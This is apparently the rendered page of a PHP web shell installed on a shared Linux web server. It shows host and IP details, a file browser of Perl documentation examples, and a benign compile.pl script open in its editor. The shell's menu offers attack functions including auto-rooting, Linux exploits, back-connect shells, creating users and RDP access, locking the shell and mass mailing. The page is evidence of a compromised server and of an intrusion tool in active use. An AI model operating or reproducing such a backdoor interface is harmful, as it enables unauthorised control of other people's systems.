Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libdate-pcalc-perl /
examples /
tools /
[ HOME SHELL ]
Name
Size
Permission
Action
compile.bat
962
B
-rw-r--r--
compile.pl
1.08
KB
-rwxr-xr-x
compile.sh
995
B
-rwxr-xr-x
iso2pc.c.gz
3.52
KB
-rw-r--r--
pc2iso.c.gz
3.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : compile.pl
#!/usr/bin/perl -w ############################################################################### ## ## ## Copyright (c) 1998 - 2009 by Steffen Beyer. ## ## All rights reserved. ## ## ## ## This program is free software; you can redistribute it ## ## and/or modify it under the same terms as Perl itself. ## ## ## ############################################################################### use Config; $self = $0; $self =~ s!^.*/!!; unless (@ARGV) { die "Usage: perl $self <main>[.c] [ <other.c> ]*\n"; } $main = shift; $main =~ s/\.c$//; unless (-f "$main.c") { die "$self: file '$main.c' does not exist!\n"; } $cc = $Config{'cc'}; $flags = $Config{'ccflags'}; @ARGV = map("\"$_\"",@ARGV); system("$cc $flags -o $main $main.c @ARGV");
Close